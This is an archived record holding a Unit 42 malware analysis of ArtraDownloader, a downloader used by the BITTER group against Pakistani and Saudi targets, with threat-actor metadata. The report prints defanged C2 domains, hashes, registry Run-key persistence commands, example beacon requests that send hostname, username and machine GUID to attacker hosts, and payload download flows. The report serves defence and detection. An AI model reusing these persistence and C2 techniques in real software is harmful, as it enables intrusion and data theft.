{
	"id": "bd8e3c54-5eee-44ff-b4aa-05d50eb27fef",
	"created_at": "2026-04-06T00:08:19.526631Z",
	"updated_at": "2026-04-10T03:33:57.079346Z",
	"deleted_at": null,
	"sha1_hash": "f3d22a815a19aeaac62dea979b66fcc148227edf",
	"title": "Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 262244,
	"plain_text": "Multiple ArtraDownloader Variants Used by BITTER to Target Pakistan\r\nBy Josh Grunzweig, Brittany Barbehenn\r\nPublished: 2019-02-25 · Archived: 2026-04-05 21:05:17 UTC\r\nExecutive Summary\r\nSince at least 2015, a suspected South Asian threat grouping known as BITTER has been targeting Pakistan and Chinese\r\norganizations using variants of a previously unreported downloader. We have named this malware family ArtraDownloader\r\nbased on a PDB string discovered within the samples. We’ve observed three variants of this downloader with the earliest\r\ntimestamp of February 2015.  This downloader has frequently been observed downloading the Remote Access Trojan (RAT)\r\nBitterRAT which is associated with BITTER threat operations.\r\nStarting in September 2018 and continuing through the beginning of 2019, BITTER launched a wave of attacks targeting\r\nPakistan and Saudi Arabia. This is the first reported instance of BITTER targeting Saudi Arabia. Details surrounding these\r\nattacks and the three ArtraDownloader variants observed are described below.\r\nActivities\r\nBetween mid-September 2018 and January 2019, Unit 42 observed the ArtraDownloader used in the targeting of Pakistan\r\nand Saudi Arabian organizations. Several malicious documents have been identified, all communicating with likely\r\ncompromised, legitimate Pakistan websites to retrieve the payload. These websites include those associated with the\r\nPakistan government and other Pakistan organizations.\r\nBeginning on Sep 12, 2018, we observed files with the following names hosted on the URL https://wforc[.]pk/js/.\r\nInternet Data Traffic Report – August 2018.docx\r\nPAF Webmail Security Report.doc.exe\r\nThe presumed spear phish targeted an employee of  an organization  in Saudi Arabia. The malicious file communicated with\r\nthe C2 nethosttalk[.]com.\r\nAround the same timeframe, two additional files (listed below) were observed being hosted on another Pakistan website.\r\nThese executables, which had the following names, were hosted on the URL khurram.com[.]pk/js/drvn and communicated\r\nwith the domain nethosttalk[.]com for C2.\r\nHandling of Logistics.pdf[.]com\r\nCyber security work shop.pdf[.]com\r\nBeginning on Nov 6, 2018, the URL http://rmmun.org[.]pk/svch was observed hosting two ArtraDownloader files that\r\ncommunicated with the domains info.viewworld71[.]com or hewle.kielsoservice[.]net.  The RMMUN, Roots Metropolitan\r\nModel United Nations, is an organized event that was held on November 8-11, 2018 which fosters collaboration and insights\r\ninto issues such as human rights and economic development.\r\nBetween November 2018 and January 2019, an engineering and hydraulics company in Pakistan, almasoodgroup[.]com was\r\nobserved hosting two AtraDownloader executables as well as a malicious document used to deliver a payload.  One of the\r\nfiles, Port Details.doc is an RTF document crafted to exploit the EQNEDT vulnerability CVE-2017-11882. This file\r\ndownloaded a payload that also communicated with the domain hewle.kielsoservice[.]net. The other two files hosted on the\r\nengineering company’s domain communicated with command and control domain xiovo426[.]net.\r\nOn 2 Jan 19, the file article_amy.doc was also uploaded into VirusTotal. This document was hosted on\r\nalmasoodgroup[.]com/js/cwqj and communicated with C2 domain thepandaservices.nsiagenthoster[.]net. The domain\r\nalmasoodgroup[.]com appears to be a legitimate but compromised domain in this particular instance.\r\nOn December 17 and 18 2018, a file was downloaded from http://fst.gov[.]pk/images/winsvc (SHA256: ef0cb0a1…) after a\r\nuser accessed the document cocktail and the dinner in the last week of dec.doc. We do not know how the user was initially\r\nenticed to execute this document. This payload is an instance of ArtraDownloader variant 1 exploits CVE-2017-11882\r\n(EQNEDT). In this case it was observed using the command and control domain of hewle.kielsoservice[.]net/Engset.php.\r\nVariant Comparison\r\nIn total, roughly 80 unique instances of the ArtraDownloader malware family have been discovered. Within these samples, 3\r\ndistinct variants are identified. These variants generally have minor changes between them, specifically as it pertains to\r\nstring obfuscation, as well as HTTP requests.\r\nThe earliest sample identified belonging to ArtraDownloader has a compile timestamp of February 2015, which provides a\r\nrough outline as to how old this malware family is.\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 1 of 8\n\nTo date, Unit 42 has only observed this malware family downloading and executing instances of the RAT malware family\r\nassociated with BITTER. A breakdown as to when each identified sample was compiled is as follows:\r\nFigure 1 Timeline of ArtraDownloader variants based on compile timestamps\r\nOverall, the ArtraDownloader malware family is not sophisticated, leveraging simple registry keys for persistence and HTTP\r\nrequests to download and execute a remote file. Important strings within these samples are obfuscated by adding or\r\nsubtracting from each byte within a string. This same obfuscation routine is used when sending data via HTTP.\r\nOf interest, during this analysis we discovered infrastructure use overlap seen in a previously analyzed payload. In\r\nNovember 2017 we reported on malicious documents that were downloaded from the domain zmwardrobe[.]com and\r\nsubsequently executed a payload referred to as MY24. This activity was observed through September and October 2017. In\r\nNovember 2017, we first observed ArtraDownloader querying the same domain; this continuing through February 2018.\r\nBoth payloads were observed in InPage exploits.\r\nFor more information about the variants discovered and an in-depth analysis on each, please refer to the Appendix.\r\nConclusion\r\nTo date, the threat actor commonly referred to as BITTER continues to be active against various regions across the globe.\r\nThey are observed targeting Pakistan, China, and Saudi Arabia using a customized downloader malware family named\r\nArtraDownloader. This downloader, leveraging unique custom obfuscation routines downloads and executes the BitterRAT\r\nmalware family via HTTP.\r\nMultiple organizations have been affected or found to be hosting the malware used by BITTER, including the Pakistan\r\ngovernment, an engineering company, and an electrical provider. We will continue to monitor this threat actor in the future.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nAll malware is appropriately classified as malicious in WildFire\r\nDomains being used for communication by malware and URLs hosting malware are flagged as malicious\r\nAutoFocus customers may use the BITTER, BITTERRAT, and ArtraDownloader tags for continued tracking of this\r\nthreat.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers\r\nand to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\ncyberthreatalliance.org.\r\nAppendix\r\nArtraDownloader Malware Analysis – Variant 1\r\nFor the remainder of the analysis, the following file is used:\r\nMD5 7cc0b212d1b8ceb808c250495d83bae4\r\nSHA1 d2c161ce52240b61d632607a2262890327d82502\r\nSHA256 ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57\r\nCompile Timestamp 2018-12-06 11:14:45 UTC\r\nTable 1 ArtraDownloader Variant 1 Sample\r\nUpon execution, the sample will create and register a new window class with the following properties:\r\nWindow Name: seal\r\nClass Name: SEAL\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 2 of 8\n\nUpon receiving a WM_CREATE message in this newly created window class, it will execute a new function after 20\r\nseconds via a call to SetTimer(). This function is responsible for actually downloading and executing a remote payload and\r\nwill only be called at the end of the malware’s execution.\r\nArtraDownloader continues to collect the following information from the victim machine:\r\nComputer name\r\nOperating system\r\nUsername\r\nThroughout the malware’s execution, various strings are encoded to avoid detection. The following Python code may be\r\nused to decode these strings:\r\ndef decode(data):\r\nout = \"\"\r\nfor d in data:\r\nout += chr(ord(d)-1)\r\nreturn out\r\nExample:\r\n\u003e\u003e print(decode(\"ifxmf/ljfmtptfswjdf/ofu\"))\r\n\u003e\u003e hewle.kielsoservice[.]net\r\nIt then attempts to acquire the following folder paths. The first successfully identified folder will be used.\r\nTEMPLATES\r\nNETHOOD\r\nAPPDATA\r\nThe ctfmon.exe file is appended to this path, which will be the destination ArtraDownloader copies itself too in the event\r\nthis file does not already exist.\r\nThe malware then attempts to acquire the following folder paths. The first successfully identified folder will be used.\r\nNETHOOD\r\nTEMPLATES\r\nAPPDATA\r\nThe perfc file is appended to this path, which will be the temporary destination the malware uses when downloading a\r\nremote file.\r\nThe downloader proceeds to identify the victim’s machine GUID via the\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid registry key. If this key is successfully queried, a string with\r\nthe following data is formatted:\r\n[Computer Name]##[Username]@@[Machine GUID]\r\nOtherwise, the following string is generated:\r\n[Computer Name]!@[Username]\r\nThis information will be used in subsequent network requests. In order to ensure persistence, the malware modifies the\r\nhost’s registry to accomplish this. The following two keys are set:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\JITDfbug - \"cmd /c start %Qrp% \u0026\u0026 exit\"\r\nHKCU\\Environment\\Qrp - [path]\\ctfmon.exe\r\nWhere [path] is the previously chosen path where ArtraDownloader has copied itself. These two registry key modifications\r\nensure that the malware executes every time the victim machine starts.\r\nAt this point in the malware’s execution flow, the previously discussed function that is executed on a 20 second timer will\r\nultimately run. It will begin by making the following example POST request to the remote C2 server:\r\nPOST /Engset.php HTTP/1.0\r\nHost: hewle.kielsoservice[.]net\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 3 of 8\n\nConnection: keep-alive\nContent-type: application/x-www-form-urlencoded\nContent-length: 148\nBCDEF=XJO.82GO2QF2BU9\u0026MNOPQ=Xjoepxt!8!Vmujnbuf\u0026GHIJ=Kpti!Hsvo{xfjh\u0026UVWXYZ=XJO.82GO2QF2BU9$$Kpti!Hsvo{xfjhAA214cf8\nIn this request, the POST data is encoded using the same technique witnessed on the strings. Upon decoding them, we are\npresented with the following:\nPOST\nVariable\nDescription Decoded Example\nBCDEF Hostname WIN-71FN1PE1AT8\nMNOPQ Microsoft Windows Version Windows 7 Ultimate\nGHIJ Username Josh Grunzweig\nUVWXYZ\nPreviously created string used as a unique\nidentifier for the victim\nWIN-71FN1PE1AT8##Josh Grunzweig@@103be7f4-\nbfb8-40fa-803c-e06bdf9d3bb6\nst\nBoolean value indicating if previously\ndownloaded file executed successfully.\n0\nTable 2 Decoded POST requests in ArtraDownloader Variant 1\nThe expected response is as follows, where ‘qbzmpbe’ is the example encoded executable name (decoded: ‘payload’) that\nwill be downloaded and executed:\nDFCB=DWN qbzmpbe  \nAfter the expected response is returned by the remote C2 server, ArtraDownloader will make the following POST request:\nThe above example request is using the same unique identifier that was witnessed in the previous request’s UZWXYZ POST\nvariable.\nThe remote C2 server expects the response to be of the following format:\nexe[hex-encoded data]\u0026lt\nWhere [hex-encoded data] is the hex-encoded payload binary. The raw response is written to the perfc file, such as in the\nfollowing example from a mock C2 server:\nHTTP/1.0 200 OK\nContent-Type: text/html; charset=utf-8\nContent-Length: 28\nServer: Werkzeug/0.12.2 Python/2.7.15\nDate: Tue, 08 Jan 2019 18:46:23 GMT\nexe68656c6c6f20776f726c64\u0026lt\nAfter this file is written, the malware proceeds to decode the hex-encoded data and writes this to the previously defined\nfilename in the same path as perfc. In our example from earlier, since payload was provided as the filename, this particular\npayload would be written to payload.exe. Using our example from the mock server, this file would contain the string hello\nworld.\nAt this stage, the malware proceeds to open this newly created executable in a new process via a call to ShellExecuteA().\nShould this be successful, ArtraDownloader will make a subsequent HTTP request to /Engset.php with the same POST\nparameters. However, in this request, the st POST variable is set to 1.\nArtraDownloader Malware Analysis – Variant 2\nFor the remainder of the analysis, the following file is used:\nMD5 8d42c01180be7588a2a68ad96dd0cf85\nSHA1 89a7861acb7983ad712ae9206131c96454a1b3d8\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\nPage 4 of 8\n\nSHA256 0b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0\r\nCompile Timestamp 2019-01-07 07:13:47 UTC\r\nPDB String c:\\Users\\Asterix\\Documents\\Visual Studio 2008\\Projects\\28NovDwn\\Release\\28NovDwn.pdb\r\nTable 3 ArtraDownloader Variant 2 Sample\r\nUpon execution, the sample will create and register a new window class with the following properties:\r\nWindow Name: 28NovDwn\r\nClass Name: MY28NOVDWN\r\nThe malware proceeds to decode a series of strings using a simple routine. The following Python script may be used to\r\ndecode strings belonging to this cluster:\r\ndef decode(data):\r\nout = \"\"\r\nfor d in data:\r\nout += chr((ord(d)-3)\u00260xFF)\r\nreturn out\r\n\u003e\u003e print(decode(“iudphzrunvxssruw1qhw”))\r\n\u003e\u003e frameworksupport[.]net\r\nIt proceeds to attempt to create the C:\\intel\\ directory, which is where various files will eventually be stored. It creates the\r\nfollowing registry if it doesn’t already exist with the intent of persisting on the victim machine:\r\nHKCU\\Environment\\AppId – c:\\intel\\msdtcv.exe\r\nArtraDownloader then sets the following registry key to ensure that the malware executes across reboots.\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run – cmd /c start %AppId% \u0026\u0026 exit\r\nAdditionally, in a separate thread, the malware will spawn a new process to copy itself to the C:\\intel\\msdtcv.exe path.\r\nVarious information about the victim machine is collected, including information about the operating system, the machine’s\r\nGUID, as well as the hostname. This information will ultimately be used to both identify the victim and provide general\r\ninformation about the infected host.\r\nThe following example GET request is made to the remote C2 server:\r\nGET /ourtyaz/qwe.php?\r\nTIe=214cf8g5.cgc9.51gb.914d.f17ceg%3ae4cc7*XJO.82GO2QF2BU9*%3aACme%3b%217%2f2%2f8712%21Tfswjdf%21Qbdl%212\r\nHTTP/1.1\r\nHost: frameworksupport[.]net\r\nConnection: close\r\nIn the example request above, the data supplied in the TIe GET variable is separated by a * and the remaining data is\r\nencoded by adding one to each byte. Decoding this string, we are presented with the following:\r\n103be7f4-bfb8-40fa-803c-e06bdf9d3bb6*WIN-71FN1PE1AT8*9@Bld: 6.1.7601 Service Pack 1\r\nThe data above includes the machine’s GUID, the victim’s hostname, as well as information about the operating system.\r\nThis particular GET request is looking for the AXE: identifier, as witnessed in the following C2 response:\r\nHTTP/1.1 200 OK\r\nX-Powered-By: PHP/5.6.36\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 23\r\nDate: Tue, 20 Nov 2018 22:27:56 GMT\r\nAccept-Ranges: bytes\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 5 of 8\n\nServer: LiteSpeed\r\nConnection: close\r\nAXE: #wscspl#\r\nSIZE: ##\r\nIn this response, the data between the # is parsed, and a subsequent request is made. Should this information be present in\r\nthe response, the malware will query the CSIDL_HISTORY folder, which represents the file system directory that serves as\r\na common repository for Internet history items. This path has the string ZX appended to it, followed by the filename used in\r\nthe HTTP response, which in our example was wscspl. An example of this is as follows:\r\nC:\\Users\\[username]\\AppData\\Local\\Microsoft\\Windows\\HistoryZXwscspl\r\nThe HTTP request for data that will be supplied to this newly formed file path is as follows:\r\nGET /ergdfbd/wscspl HTTP/1.1\r\nHost: frameworksupport[.]net\r\nConnection: Close\r\nThe entire HTTP response is written to the previously described file path. ArtraDownloader will then parse this entire HTTP\r\nresponse’s POST data, extracting everything at offset 0x1 to a file path without the ZX characters, and with the .exe\r\nextension. Using our previous example, this file would be the following:\r\nC:\\Users\\[username]\\AppData\\Local\\Microsoft\\Windows\\Historywscspl.exe\r\nThe previously written file containing ZX in the path is removed. Finally, this file is executed in a new process. If this\r\nexecutable is spawned without errors, the malware will send the following example final HTTP request:\r\nGET /ourtyaz/dwnack.php?cId=214cf8g5.cgc9.51gb.914d.f17ceg%3ae4cc7 HTTP/1.1\r\nHost: frameworksupport[.]net\r\nConnection: Close\r\nArtraDownloader Malware Analysis – Variant 3\r\nFor the remainder of the analysis, the following file is used:\r\nMD5 a1bdb1889d960e424920e57366662a59\r\nSHA1 177837d0fa5bfd274abe79d80a01cfe2374b4cd9\r\nSHA256 f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22\r\nCompile Timestamp 2018-07-30 09:18:37 UTC\r\nPDB String d:\\C++\\new_downloader_aroundtheworld123\\Release\\audiodq.pdb\r\nTable 4 ArtraDownloader Variant 3 Sample\r\nUpon execution, the malware begins by decoding a series of strings via a simple decoding routine. The following Python\r\nscript may be used to decode strings belonging to this cluster:\r\ndef decode(data):\r\nout = \"\"\r\nfor d in data:\r\nout += chr((ord(d)-13)\u00260xFF)\r\nreturn out\r\n\u003e\u003e print(decode(binascii.unhexlify(\"6E7F7C827B71817572847C7F79713E3F403B7B7281\")))\r\n\u003e\u003e aroundtheworld123[.]net\r\nThe malware proceeds to check to determine if the AVG security product is currently running on the system, however, this\r\ninformation does not appear to be used by ArtraDownloader. It is possible that this might have been a remnant of testing\r\nbeing performed by the malware author that was unintentionally left within the sample.\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 6 of 8\n\nVarious information about the system is collected by the malware and used in subsequent HTTP requests. After this\r\ninformation is collected, the following example HTTP GET request is performed:\r\nGET ///healthne/accept.php?a=WIN-71FN1PE1AT8\u0026b=WIN-71FN1PE1AT8\u0026c=Windows%207%20Ultimate\u0026d=Josh\r\nGrunzweigJosh Grunzweig103be7f4-bfb8-40fa-803c-e06bdf9d3bb6365536040965860\u0026e= HTTP/1.1\r\nHost: aroundtheworld123[.]net\r\nNote that unlike other variants witnessed in this malware family, this particular variant does not obfuscate data being sent\r\nacross the network. The following GET parameters are used within this request:\r\nGET\r\nVariable\r\nDescription\r\na Hostname\r\nb Computer name\r\nc Operating system version\r\nd\r\nUnique string containing two instances of the victim’s username, the machine’s GUID, as well as\r\nvarious information queried via a call to GetSystemInfo()\r\ne A variable that does not appear to be used within this particular sample\r\nTable 5 GET Parameters Observed in ArtraDownloader Variant 3\r\nAn example response to this request can be seen below.\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 29\r\nDate: Mon, 05 Nov 2018 19:22:56 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nConnection: Keep-Alive\r\nYes file58368[regdl]35No file\r\nThe response to this request is parsed, specifically attempting to identify the string Yes file. Should this string be present, the\r\ndata between [ and ] is parsed. This data is used in a subsequent HTTP request made that will download a file from the\r\nremote server, as seen below:\r\nGET /healthne/healthne/regdl HTTP/1.0\r\nHost: aroundtheworld123[.]net\r\nHTTP/1.0 200 OK\r\nLast-Modified: Tue, 02 Oct 2018 04:38:28 GMT\r\nContent-Type: application/octet-stream\r\nContent-Length: 58368\r\nDate: Mon, 05 Nov 2018 19:23:01 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nConnection: close\r\nMZ......................[TRUNCATED]\r\nThis executable file is written to the same directory as the malware and uses the same name provided. As an example,\r\nshould this malware originally be executed from C:\\, the downloaded file would be written to C:\\regdl.exe. Finally, this\r\nexecutable is run in a new process.\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 7 of 8\n\nIndicators of Compromise\r\nPlease refer to the following link for a CSV file containing all relevant IOCs:\r\nhttps://github.com/pan-unit42/iocs/tree/master/bitter\r\nSource: https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nhttps://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
	],
	"report_names": [
		"multiple-artradownloader-variants-used-by-bitter-to-target-pakistan"
	],
	"threat_actors": [
		{
			"id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b",
			"created_at": "2022-10-27T08:27:13.133291Z",
			"updated_at": "2026-04-10T02:00:05.315213Z",
			"deleted_at": null,
			"main_name": "BITTER",
			"aliases": [
				"T-APT-17"
			],
			"source_name": "MITRE:BITTER",
			"tools": [
				"ZxxZ"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bf6cb670-bb69-473f-a220-97ac713fd081",
			"created_at": "2022-10-25T16:07:23.395205Z",
			"updated_at": "2026-04-10T02:00:04.578924Z",
			"deleted_at": null,
			"main_name": "Bitter",
			"aliases": [
				"G1002",
				"T-APT-17",
				"TA397"
			],
			"source_name": "ETDA:Bitter",
			"tools": [
				"Artra Downloader",
				"ArtraDownloader",
				"Bitter RAT",
				"BitterRAT",
				"Dracarys"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434099,
	"ts_updated_at": 1775792037,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f3d22a815a19aeaac62dea979b66fcc148227edf.pdf",
		"text": "https://archive.orkl.eu/f3d22a815a19aeaac62dea979b66fcc148227edf.txt",
		"img": "https://archive.orkl.eu/f3d22a815a19aeaac62dea979b66fcc148227edf.jpg"
	}
}